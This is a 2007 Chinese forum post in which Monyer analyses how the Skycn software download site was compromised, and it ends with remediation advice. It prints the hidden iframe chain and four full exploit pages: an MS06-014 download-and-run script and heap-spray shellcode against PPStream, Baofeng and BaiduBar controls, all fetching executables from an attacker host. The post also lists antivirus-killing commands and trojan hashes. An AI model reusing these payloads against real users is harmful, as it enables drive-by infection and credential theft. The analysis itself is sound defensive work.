诚毅小家|集美大学生活【集美大学,诚毅学院,水产学院,师范学院,美术学院,财经学院,体育学院,航海学院,集美学村,石鼓路,龙舟池】

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
查看: 401|回复: 2

天空软件站被挂马的幕后及Monyer的分析

[复制链接]
发表于 2007-10-7 16:16:38 | 显示全部楼层 |阅读模式
    天空软件站是中国最大的软件下载站之一,如今它被挂马了,那么想必已经有几千万人中招了。Monyer并不是危言耸听,下面的分析将证明这不是个笑话。4 z2 ^% @% f5 f% \0 `! x  O
    今天偶尔上天空看我的UDisk时(重要提醒,天空有病毒不要打开,晕了!),发现Maxthon居然弹出程序运行警告,提示我在c盘下有个c.exe文件要运行,不知道其他人遇到这种情况怎么想,反正从我电脑上出现便成了一件恐怖的事情。看了看任务管理器,内存已经增加了几百兆,很显然被溢出了。再看看C盘的根目录,一个c.exe文件正躺在那里(这说明病毒文件还没有运行,如果运行了,估计你就什么都看不到了。)。于是便开始了以下寻马之旅。7 N1 a- v) q: s0 ?! J: S! z; m
: D5 L+ T6 [- v, h3 O) v% W3 p4 a
   通过对天空站的分析,被挂马的页面仅存在于软件下载页面。再通过对加进的javascript和iframe的排除,最后落定被插入的恶意代码为:
! ~# ?% |$ ~: h3 W<iframe name=import_frame width=1height=1 src=http://iplog.skycn.com/wherefrom.php?id=32336frameborder=no></iframe>* }1 c! X& i+ O5 n/ Y0 q
它将框架的宽高设为1像素即肉眼不可见。下载whereform.php文件发现里面有另外的代码:
9 \7 f* ^$ r, k7 p- ]<iframe src=http://www.ip17173.cn/index.html?419891509 width=100 height=0></iframe>
  x& L1 e  q% y& s# [又一个框架,直接访问将看到两个计数器,挺有意思
) W5 d  ?; H) O$ A# D! U( J
3 z1 f' j) I  c3 d4 H0 J  继续下载ip17173.cn这个站点上的index.html文件打开,里面是一堆加密的javascript代码,这是件好事情——小偷偷东西通常都把脸蒙起来。% t6 {' A3 ?4 G5 u$ q- _) H* Z; S! G
简单看了一下,虽然js被加密得面目全非,但好在解密函数还在,那么一切都变得简单,将document.write换成alert即可。运行一下index.html,弹出第二个alert窗口便是木马的所在了- m4 |3 a6 U2 q5 y# I6 w+ j: Z/ x
个iframe框架,看来应该对应9个不同的木马哦。用flashget一齐下载,发现有效的仅是vip1.htm~vip4.htm这四个页面,估计剩下的是预留出来的吧。
4 }6 t9 n6 i; U9 a2 h$ n对这四个页面依次做代码分析便有些冒冷汗了。以下是分析结果
# V7 ?+ F0 i$ F7 |* B( A
  M. i/ s$ B. q% o
http://www.ip17173.cn/vip1.htm     MS-06014     down.exe     c:\1.exe
# c8 s$ V. r/ i% h7 Q7 a<script>url2="http://www.ip17173.cn/down.exe";url1="http://www.ip17173.cn/run.js";try{varado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");varxml=ado.CreateObject("Microsoft.XML"+"HTTP","");varas=ado.createobject("Adodb.Stream","");xml.Open("GET",url1,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path1="..//ntuser.js";as.savetofile(path1,2);as.close();xml.Open("GET",url2,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path2="C:\\1.exe";as.savetofile(path2,2);as.close();varshell=ado.createobject("Shell.Application","");shell.shellExecute(path1,"","","open",0);}catch(e){};</script><body>查无此页<html> : ?1 l! \( Y% k. |/ M  b* V, K
http://www.ip17173.cn/vip2.htm     ppstream    down.exe     c:\c.exe
7 v% L# q9 ^) ]- @$ _4 m<html><body><objectid="pingfan"classid="clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458"></object><script>varshellcode=unescape("%u00E8%u0000%u6A00%uEB03%u7E21%uE2D8%u9873%u8AFE%u8E0E%u0E4E%u55EC%u4C52%u4F4D%u004E%u3600%u2F1A%u6370%u5C3A%u2E63%u7865%u0065%u5F59%u67AF%uA164%u0030%u408B%u8B0C%u1C70%u8BAD%u0868%u8B51%u3C75%u748B%u782E%uF503%u8B56%u2076%uF503%uC933%u4149%u03AD%u33C5%u0FDB%u10BE%uF238%u0874%uCBC1%u030D%u40DA%uF1EB%u1F3B%uE775%u8B5E%u245E%uDD03%u8B66%u4B0C%u5E8B%u031C%u8BDD%u8B04%uC503%u59AB%uBCE2%u0F8B%uF980%u7463%u570A%uD0FF%uAF95%u6AAF%uEB01%u52AC%u5752%u8F8D%u10DB%u0040%uE981%u104E%u0040%u5251%uD0FF%u016A%uFF57%uEC57%u57FF%u90E8%u7468%u7074%u2F3A%u772F%u7777%u692E%u3170%u3137%u3337%u632E%u2F6E%u6F64%u6E77%u652E%u6578");bigblock=unescape("%u9090");headersize= 20;slackspace = headersize+shellcode.length;while ( bigblock.length< slackspace ) bigblock+=bigblock;fillblock = bigblock.substring(0,slackspace);block=bigblock.substring(0, bigblock.length-slackspace);while(block.length+ slackspace < 0x40000) block =block+ block + fillblock;memory =new Array();;;;memory;for (x=0; x<400;x++) memory[x] = block +shellcode;var buffer ='\x0a';while(buffer.length < 500) buffer+='\x0a\x0a\x0a\x0a';pingfan.Logo=buffer;</script></body></html>
% a8 w7 s5 ~) G* n: Z) k" Z8 z% Xhttp://www.ip17173.cn/vip3.htm     暴风      down.exe     c:\u.exe, E1 W3 V0 K: @
<html>
, E3 j! S* a9 w9 I( P5 z) ]<object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>
) a9 q5 S2 h. x6 n<body>
! ~2 L* B; o* f1 K* ^% w( a2 ^; t<SCRIPT language="javascript">
( F7 U# j" x9 y: q1 o( ^: tvarshellcode=unescape("%u9090%u9090%uEFE9%u0000%u5A00%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uD88B%u738B%u8B3C%u1E74%u0378%u8BF3%u207E%uFB03%u4E8B%u3314%u56ED%u5157%u3F8B%uFB03%uF28B%u0E6A%uF359%u74A6%u5908%u835F%u04C7%uE245%u59E9%u5E5F%uCD8B%u468B%u0324%uD1C3%u03E1%u33C1%u66C9%u088B%u468B%u031C%uC1C3%u02E1%uC103%u008B%uC303%uFA8B%uF78B%uC683%u8B0E%u6AD0%u5904%u6AE8%u0000%u8300%u0DC6%u5652%u57FF%u5AFC%uD88B%u016A%uE859%u0057%u0000%uC683%u5613%u8046%u803E%uFA75%u3680%u5E80%uEC83%u8B40%uC7DC%u6303%u646D%u4320%u4343%u6643%u03C7%u632F%u4343%u03C6%u4320%u206A%uFF53%uEC57%u04C7%u5C03%u2E61%uC765%u0344%u7804%u0065%u3300%u50C0%u5350%u5056%u57FF%u8BFC%u6ADC%u5300%u57FF%u68F0%u2451%u0040%uFF58%u33D0%uACC0%uC085%uF975%u5251%u5356%uD2FF%u595A%uE2AB%u33EE%uC3C0%u0CE8%uFFFF%u47FF%u7465%u7250%u636F%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574%u446D%u7269%u6365%u6F74%u7972%u0041%u6957%u456E%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4C00%u616F%u4C64%u6269%u6172%u7972%u0041%u7275%u6D6C%u6E6F%u5500%u4C52%u6F44%u6E77%u6F6C%u6461%u6F54%u6946%u656C%u0041%u7468%u7074%u2F3A%u772F%u7777%u692E%u3170%u3137%u3337%u632E%u2F6E%u6F64%u6E77%u652E%u6578");+ G% g  n4 T/ G+ m  \* o& a
</script>
. ~# n  {- ]6 o) P2 ?& {1 N<SCRIPT language="javascript">
% d- c2 b4 B8 r8 t1 E0 ^var bigblock = unescape("%u9090%u9090");
5 D: S' ^1 M' t% @, Fvar headersize = 20;
% P3 m' z7 h7 Q1 ^" ~var slackspace = headersize+shellcode.length;
2 z7 x! b4 x6 Twhile (bigblock.length<slackspace) bigblock+=bigblock;
4 S1 l! O4 ^. C* p/ P+ X9 _: j# Mfillblock = bigblock.substring(0, slackspace);+ I( [. x* [: Q- g. n6 V
block = bigblock.substring(0, bigblock.length-slackspace);
$ U$ T1 a: o7 X* ~- i' L) t. Twhile(block.length+slackspace<0x40000) block = block+block+fillblock;
, n* k& {# |& w3 w# P6 wmemory = new Array();
3 H! v4 v8 x+ z: M8 Xfor (x=0; x<300; x++) memory[x] = block + shellcode;; X' r' @& k: a+ a3 j% G3 k
var buffer = '';% Q0 F% c  I0 V. H: c
while (buffer.length < 4057) buffer+='\x0a\x0a\x0a\x0a';) C8 i1 Q0 n7 G# y: G
buffer+='\x0a';
& @( T& W0 f5 `- p3 ]buffer+='\x0a';
2 v5 a; v3 G$ U6 V! Z( a9 \buffer+='\x0a';
" A1 }; A- T. j; I2 W. D" v; Dbuffer+='\x0a\x0a\x0a\x0a';$ H8 k5 m/ X  c" `% J' k
buffer+='\x0a\x0a\x0a\x0a';, J: h, h' T+ H, l$ C) A
target.rawParse(buffer);1 O7 N! P$ t/ Y* d' ?& n
</script>
9 k. P4 U1 E* A* S</body>* D4 A: r* R9 \8 g0 T5 x; h& g
</html>

1 [  J$ l1 h5 i  `http://www.ip17173.cn/vip4.htm     BaiDuBar      calc.cab       down.exe
" V- c. m5 Q  |5 B) r<script>+ Q1 v$ b, s1 t1 c
function DowndloadCalcAndRun()9 M3 ]& S; R4 o2 W+ A+ ~1 h
{
9 V* L$ @9 v9 A: B3 V" {. Kcom.DloadDS("
http://www.ip17173.cn/calc.cab", "down.exe", 00);
6 n; h1 z2 x# b" |8 m; B+ b8 ^}- x2 Q$ f$ R) b) y" \
</script>( L6 n/ a. A+ h& s( P
</head>7 F4 R! N/ r7 e+ E, l( {* s
<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}">
/ u" K* T8 c$ {</OBJECT>
; p) H3 J5 @% f( q<script>
1 w! p( ]& a+ C. {2 NDowndloadCalcAndRun(): s# e# ^% Y5 M; d+ [8 d$ P
</script>5 ?; `! N- Z# j+ `4 @. V; H
<body>欢迎使用<html>
+ n7 _4 U& u2 q1 a0 Q8 S2 g
4个溢出漏洞,在前几天还有3个是0day!! k0 H- o6 F- m/ P
一个是ms-06014漏洞,会将其站点的down.exe文件保存到c:\1.exe并运行/ H0 s( t" B: u+ H- Q/ E4 A
一个是ppstream堆栈溢出,将同样文件保存到c:\c.exe并运行
# u! ?" F0 k8 `& u一个是暴风影音溢出漏洞,保存到c:\u.exe并运行; ~* j9 {' \& e/ \: h  h
一个是baidubar的溢出漏洞,将calc.cab 保存到down.exe并运行
4 x! R# e0 r6 F(这些文件运行后会自我删除,然后关闭杀毒软件,并自动下载其他木马或病毒。)
# u8 R' g' T+ c6 c% c其中ppstream直到如今仍没有官方补丁。0 _+ I/ M/ }# R7 b3 S) I
down.exe文件一看名便知是个下载者了,下载下来传到virscan.org不禁又汗然一把- c+ x& z  V8 [) H2 `. Y
AVG、巴斯基、江民瑞星金山三大支柱、诺顿、趋势,全部开绿灯。即使熊猫来一个suspiciousfile,也顶多因为其是fsg2.0壳而报个可疑文件,这意味着它是不会主动删除的。麦咖啡虽然给出个pws,但也仅仅是个low的风险等级。所以几乎所有市面上常见的杀毒软件全部“罢工”。
4 y: D8 u, v7 Qdown.exe会下载21个文件。
) _, K6 b7 ]% g) e$ Xhttp://www.ip17173.cn/down/1.exe - 20.exe、down.exe
' Y  u$ w/ ^; i" c- q分别保存到C:\Program Files\Internet Explorer\1.exe - 20.exe、down.exe 运行
: R/ ]. Y( J; b还会执行
; H, w& a6 c+ R) i/ \% a! u: Tcmd /c taskkill /im 360safe.exe /f* C) j, N! k7 F( [$ r
cmd /c date 2000-01-01- m! \+ N; |$ U1 v! i3 `

. A3 _% S; w5 F  W. m然后还有一个删除自身的批处理。
9 V/ W( S; F: B8 }+ `7 s
5 w  i$ N! b& F还有其他的比如放到启动项,改名字什么的。

$ E3 R1 `+ ?; [- N  |, Z. c感谢鬼仔提供信息!, z5 c& v3 W5 ]) v
 楼主| 发表于 2007-10-7 16:17:40 | 显示全部楼层
第二次下载的16个病毒文件为(另外值得一提的是antivir小红伞对包括down.exe在内的16个病毒全部通杀,而它是款免费杀毒软件,可以与部分系统杀毒软件兼容):, n$ s4 k6 t4 w; u0 h1 n+ R! i
1.exe tr/dropper.gen# w! A" C( Y0 v# T
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo# k  Y$ t# b; b
md5:D92BF450DA49DB121009F94E1321EDF4" u: k' o2 w+ k  m0 }
2.exe tr/dropper.gen
( p3 F4 C# v& C- ^( R$ DUPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
1 j8 G; X! Z# h) f6 G2 smd5:E6D8CCC8AD8BBEB18652D432BF4A13BA
6 U( t7 w( E, g3.exe tr/dropper.gen
6 w! K) n1 t- eUPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo( w5 e& b, f9 U- u( A" R
md5:362D6904DE8D8111E1BD20BA5320E7FA$ j. a. u7 h; Z0 k& K* y
4.exe tr/dropper.gen
+ F/ [7 i( _! n  S8 \' g4 _UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
' Y# [7 ~: u8 x7 t: e" L# O  n" Nmd5:23DF9595AA8F10EB8AC850A5ACFAB791
4 R. }' _0 A& I8 i6.exe tr/dropper.gen
' M! D7 m4 x4 H" A9 xUPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo2 S4 w: G+ k! D; a
md5:FEACB467E170BAD60ECB2091064022289 [0 P8 r/ z' e  d. N
7.exe Win32.PSWTroj.OnLineGames.dz.163840
" ?+ l+ q) o% b8 U( Z. V& _nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping [Overlay]5 ~+ _& d, E' Q- J3 y6 F3 S0 [6 k( L
md5:7BD941FA726E9CFB30A68F7768080B04
, G/ A6 H+ Y7 t$ M/ J7 K8.exe tr/dropper.gen
5 y2 K# A& Y% d. Z% {UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
' g* }  B7 R: q0 U5 P' Pmd5:BD618C1C29BC1C7CB69AEA2BA49D7C458 [, v( @1 \# P+ @, l' a% K
9.exe suspicious file% F4 X5 N& ~* \  J$ r) T' g
Upack 0.3.9 beta2s -> Dwing
! Q  o. r0 D! K0 H" i: bmd5:6DC4A1336F4B0557EAFE3E3247F3C6FD0 z( a5 [4 Z" y; ?6 e1 \6 W
10.exe tr/dropper.gen7 Y9 E' G; h6 r& y% e5 n: D0 Y
Microsoft Visual C++ v6.0 DLL *
& g5 @9 X- a* {  `2 xmd5:50DF0549331035B6159DD7F2BD3947A6
8 P8 M* h  z( g* ]# W& f' u) d6 v: {: F11.exe tr/dropper.gen- q; V" `* ]6 F" V5 l; ^& Y$ ?
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo/ b( O: V! H8 ?, |2 l7 s
md5:A33527DAE1C4C541609D4FECFF63A0C91 c2 ~: {2 I0 e
13.exe tr/dropper.gen
, ^; Q7 K/ J9 z+ \3 J& }1 f: VUPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
1 @+ o0 F& M. }& `+ J, zmd5:39CC71D365556C92EEF065169ED75148% Z2 k4 W% u. t* S. a  l
15.exe suspicious file4 b4 T+ y) q* U* [
Upack 0.3.9 beta2s -> Dwing [Overlay]
4 z6 ~7 \; S/ I5 N5 P& Vmd5:1E96067D3C6A25BFF59AD76C03C2A5658 Z, E+ w3 W+ h0 y
16.exe suspicious file9 u9 v& b4 _( U  V
Upack 0.3.9 beta2s -> Dwing0 S8 ]/ I; N9 M4 _( L% y/ Q
md5:73E0B9D28014C84675BEF3343409EDB2
( \$ S  j0 W7 d# ?- y$ f, y  B' |17.exe Win32.PSWTroj.OnLineGames.dz.163840/ E" J  N' f6 h- w2 B
nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping [Overlay]
. O. i; I  `( {% Z. X: emd5:477927E9679924CEFCF8BD95DF2BA71D
) X" t) @5 q9 O; t" K18.exe Win32.PSWTroj.OnLineGames.dz.163840
8 C2 n! b* O/ Z2 _, `2 l# {nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping [Overlay]
7 P$ _8 j6 H3 U6 a: C  Qmd5:A2C87EE4059B2145DCA8CC7CF9692329# V) j* ~5 L. P; `6 Y
5.exe          cannot down
) w' I8 i( j# }& T12.exe         cannot down" M: ]2 V# M, E# B; B
14.exe         cannot down
& L5 t0 A6 E; N19.exe         cannot down9 q; A% y8 E  Z) o& `/ v
20.exe         cannot down% s+ R/ J0 U6 f+ K- D& c9 |& z
针对以上四个溢出,Monyer的解决办法如下:8 `# K; x: n  m) K+ h
下载补丁修复ms06014漏洞,将baidubar和暴风升级
1 m) X7 U6 Z& c' t而pps麻烦些——删除注册表的clasid:{20C2C286-BDE8-441B-B73D-AFA22D914DA5}以及{5EC7C511-CD0F-42E6-830C-1BD9882F3458}直到官方给出办法。
+ X0 i" V) j6 b至于天空,等官方出公告再上吧,小心湿鞋!这么大的站点被人入侵一次也不容易!
4 n. f2 h# a  G. `最后看一下该马的相关文件,挺壮观吧
' {% h( [; x$ L2 g$ S
' Y# g- _2 m; e, i  A0 P; b9 VMonyer!   2007-10-04 02:35
. i2 s, m0 o( e2 D: D1.jpg (90.61 KB)
8 Y3 }5 `- n4 t, J- p9 e% P: v' g+ D7 a" H2007-10-7 15:40
0 m# @( y# N1 e; a/ i6 M* u! f$ x9 _. U7 b. @9 Q: P/ Z
2.jpg (6.82 KB)7 Y! F6 w( c8 e+ N9 w. R& ^
2007-10-7 15:40
& i* m. h- d. U- O- {( U. T6 f8 w  p- A* K4 x# l
3.jpg (268.66 KB)+ B. j$ x4 U& L
2007-10-7 15:40/ T3 m, {8 B7 x% M
, z) H0 `  \* s
4.jpg (39.38 KB)
' l" p; d. J: B& v2 a, f4 S2007-10-7 15:405 @* L: s3 \. J; X9 c& r

( h" O5 u: B9 z7 V5.jpg (294.46 KB)+ z8 i) K$ d" N' f, I* D
2007-10-7 15:40
. w+ T6 l9 M, w" b8 U0 q1 G6 F* m" H% j5 [& F
6.jpg (197.03 KB)8 d  b+ G8 n5 x) Y8 E/ {
2007-10-7 15:40
$ j) b6 F4 U! I5 B3 b; j- Y
9 [# R  ^& _2 ?3 J- w8 U" H7.jpg (47.09 KB)
  ?# j6 e8 f6 C$ ]# L2007-10-7 15:40
发表于 2007-10-7 16:21:41 | 显示全部楼层
看了那么多,是中木马的意思吧。早说嘛。。。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|诚毅小家 ( 小家社区工作室 闽ICP备05007965号 )

GMT+8, 2025-3-4 23:13 , Processed in 0.082248 second(s), 19 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表